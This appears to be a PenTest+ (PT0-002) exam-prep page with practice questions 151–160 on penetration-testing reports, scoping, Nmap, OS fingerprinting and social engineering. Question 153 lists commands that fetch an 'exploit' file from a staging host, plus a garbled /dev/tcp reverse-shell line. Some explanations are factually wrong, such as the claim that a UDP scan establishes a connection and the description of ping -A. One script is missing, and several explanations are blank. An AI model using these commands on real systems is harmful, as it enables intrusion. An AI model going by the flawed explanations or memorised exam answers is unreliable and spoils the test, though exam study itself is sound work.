CompTIA PT0-002 Online Practice Questions and Exam Preparation

CompTIA PT0-002 Online Questions & Answers

• Question 151:

  A penetration tester has completed an analysis of the various software products produced by the company under assessment. The tester found that over the past several years the company has been including vulnerable third-party modules in multiple products, even though the quality of the organic code being developed is very good.

  Which of the following recommendations should the penetration tester include in the report?

  A. Add a dependency checker into the tool chain.
  B. Perform routine static and dynamic analysis of committed code.
  C. Validate API security settings before deployment.
  D. Perform fuzz testing of compiled binaries.
  A. Add a dependency checker into the tool chain.

  ---

  Explanation

  Adding a dependency checker into the tool chain is the best recommendation for the company that has been including vulnerable third-party modules in multiple products. A dependency checker is a tool that analyzes the dependencies of a software project and identifies any known vulnerabilities or outdated versions. This can help the developers to update or replace the vulnerable modules before deploying the products.

• Question 152:

  An external consulting firm is hired to perform a penetration test and must keep the confidentiality of the security vulnerabilities and the private data found in a customer's systems.

  Which of the following documents addresses this requirement?

  A. ROE
  B. NDA
  C. MOU
  D. SLA
  B. NDA

  ---

  Explanation

• Question 153:

  A penetration tester ran the following command on a staging server:

  python -m SimpleHTTPServer 9891

  Which of the following commands could be used to download a file named exploit to a target machine for execution?

  A. nc 10.10.51.50 9891 < exploit
  B. powershell -exec bypass -f \\10.10.51.50\9891
  C. bash -i >and /dev/tcp/10.10.51.50/9891 0and1>/exploit
  D. wget 10.10.51.50:9891/exploit
  D. wget 10.10.51.50:9891/exploit

  ---

  Explanation

• Question 154:

  Which of the following are the MOST important items to include in the final report for a penetration test? (Choose two.)

  A. The CVSS score of the finding
  B. The network location of the vulnerable device
  C. The vulnerability identifier
  D. The client acceptance form
  E. The name of the person who found the flaw
  F. The tool used to find the issue
  C. The vulnerability identifier
  F. The tool used to find the issue

  ---

  Explanation

• Question 155:

  A penetration tester is conducting an Nmap scan and wants to scan for ports without establishing a connection. The tester also wants to find version data information for services running on Projects.

  Which of the following Nmap commands should the tester use?

  A. ..nmap -sU -sV -T4 -F target.company.com
  B. ..nmap -sS -sV -F target.company.com
  C. ..nmap -sT -v -T5 target.company.com
  D. ..nmap -sX -sC target.company.com
  B. ..nmap -sS -sV -F target.company.com

  ---

  Explanation

  The Nmap command that the tester should use to scan for ports without establishing a connection and to find version data information for services running on open ports is nmap -sS -sV -F target.company.com. This command has the following options: -sS performs a TCP SYN scan, which is a scan technique that sends TCP packets with the SYN flag set to the target ports and analyzes the responses. A TCP SYN scan does not establish a full TCP connection, as it only completes the first step of the three-way handshake. A TCP SYN scan can stealthily scan for open ports without alerting the target system or application. -sV performs version detection, which is a feature that probes open ports to determine the service and version information of the applications running on them. Version detection can provide useful information for identifying vulnerabilities or exploits that affect specific versions of services or applications. -F performs a fast scan, which is a scan option that only scans the 100 most common ports according to the nmap-services file. A fast scan can speed up the scan process by avoiding scanning less likely or less interesting ports. target.company.com specifies the domain name of the target system or network to be scanned. The other options are not valid Nmap commands that meet the requirements of the question. Option A performs a UDP scan (-sU), which is a scan technique that sends UDP packets to the target ports and analyzes the responses. A UDP scan can scan for open ports that use UDP protocol, such as DNS, SNMP, or DHCP. However, a UDP scan does establish a connection with the target system or application, unlike a TCP SYN scan. Option C performs a TCP connect scan (sT), which is a scan technique that sends TCP packets with the SYN flag set to the target ports and completes the three-way handshake with an ACK packet if a SYN/ACK packet is received. A TCP connect scan can scan for open ports that use TCP protocol, such as HTTP, FTP, or SSH. However, a TCP connect scan does establish a full TCP connection with the target system or application, unlike a TCP SYN scan. Option D performs an Xmas scan (-sX), which is a scan technique that sends TCP packets with the FIN, PSH, and URG flags set to the target ports and analyzes the responses. An Xmas scan can stealthily scan for open ports without alerting the target system or application, similar to a TCP SYN scan. However, option D does not perform version detection (-sV), which is one of the requirements of the question.

• Question 156:

  A penetration tester wrote the following comment in the final report: "Eighty-five percent of the systems tested were found to be prone to unauthorized access from the internet."

  Which of the following audiences was this message intended?

  A. Systems administrators
  B. C-suite executives
  C. Data privacy ombudsman
  D. Regulatory officials
  B. C-suite executives

  ---

  Explanation

  The comment in the final report was intended for C-suite executives, which are senior-level managers or leaders in an organization, such as the chief executive officer (CEO), chief financial officer (CFO), or chief information officer (CIO). C-suite executives are typically interested in high-level summaries or overviews of the penetration test results, such as the percentage of systems affected by a certain vulnerability or risk, the potential impact or cost of a breach, or the recommended actions or priorities for remediation. C-suite executives may not have the technical background or expertise to understand detailed or technical information about the penetration test, such as specific vulnerabilities, exploits, tools, or techniques. The comment in the final report provides a high-level summary of the penetration test result that is relevant and understandable for C-suite executives. The other audiences are not likely to be interested in this comment. Systems administrators are technical staff who are responsible for installing, configuring, maintaining, and securing systems and networks. They would be more interested in detailed or technical information about the penetration test, such as specific vulnerabilities, exploits, tools, or techniques. Data privacy ombudsman is a person who acts as an independent mediator between individuals and organizations regarding data privacy issues or complaints. They would be more interested in information about how the penetration test complied with data privacy laws and regulations, such as GDPR or CCPA. Regulatory officials are authorities who enforce compliance with laws and regulations related to a specific industry or sector, such as finance, health care, or energy. They would be more interested in information about how the penetration test complied with industry-specific standards and frameworks, such as PCI-DSS, HIPAA, or NERC-CIP.

• Question 157:

  A penetration tester ran a ping -A command during an unknown environment test, and it returned a 128 TTL packet.

  Which of the following OSs would MOST likely return a packet of this type?

  A. Windows
  B. Apple
  C. Linux
  D. Android
  A. Windows

  ---

  Explanation

  The ping -A command sends an ICMP echo request with a specified TTL value and displays the response. The TTL value indicates how many hops the packet can traverse before being discarded. Different OSs have different default TTL values for their packets. Windows uses 128, Apple uses 64, Linux uses 64 or 255, and Android uses 64. Therefore, a packet with a TTL of 128 is most likely from a Windows OS.

  https://www.freecodecamp.org/news/how-to-identify-basic-internet-problems- with-ping/

• Question 158:

  The delivery of a penetration test within an organization requires defining specific parameters regarding the nature and types of exercises that can be conducted and when they can be conducted. Which of the following BEST identifies this concept?

  A. Statement of work
  B. Program scope
  C. Non-disclosure agreement
  D. Rules of engagement
  D. Rules of engagement

  ---

  Explanation

  Rules of engagement (ROE) is a document that outlines the specific guidelines and limitations of a penetration test engagement. The document is agreed upon by both the penetration testing team and the client and sets expectations for how the test will be conducted, what systems are in scope, what types of attacks are allowed, and any other parameters that need to be defined. ROE helps to ensure that the engagement is conducted safely, ethically, and with minimal disruption to the client's operations.

• Question 159:

  A penetration tester is testing a new API for the company's existing services and is preparing the following script:

  

  Which of the following would the test discover?

  A. Default web configurations
  B. Open web ports on a host
  C. Supported HTTP methods
  D. Listening web servers in a domain
  C. Supported HTTP methods

  ---

  Explanation

  The script is using the requests library to send an OPTIONS request to the API endpoint, which returns a list of supported HTTP methods for that resource. This can help the penetration tester to identify potential attack vectors or vulnerabilities based on the methods allowed.

• Question 160:

  A penetration tester breaks into a company's office building and discovers the company does not have a shredding service. Which of the following attacks should the penetration tester try next?

  A. Dumpster diving
  B. Phishing
  C. Shoulder surfing
  D. Tailgating
  A. Dumpster diving

  ---

  Explanation

  The penetration tester should try dumpster diving next, which is an attack that involves searching through trash bins or dumpsters for discarded documents or items that may contain sensitive or useful information. Dumpster diving can reveal information such as passwords, account numbers, credit card numbers, invoices, receipts, memos, contracts, or employee records. The penetration tester can use this information to gain access to systems or networks, impersonate users or employees, or perform social engineering attacks. The other options are not likely attacks that the penetration tester should try next based on the discovery that the company does not have a shredding service. Phishing is an attack that involves sending fraudulent emails that appear to be from legitimate sources to trick users into revealing their credentials or clicking on malicious links or attachments. Shoulder surfing is an attack that involves observing or spying on users while they enter their credentials or perform other tasks on their devices. Tailgating is an attack that involves following authorized personnel into a restricted area without proper authorization or identification.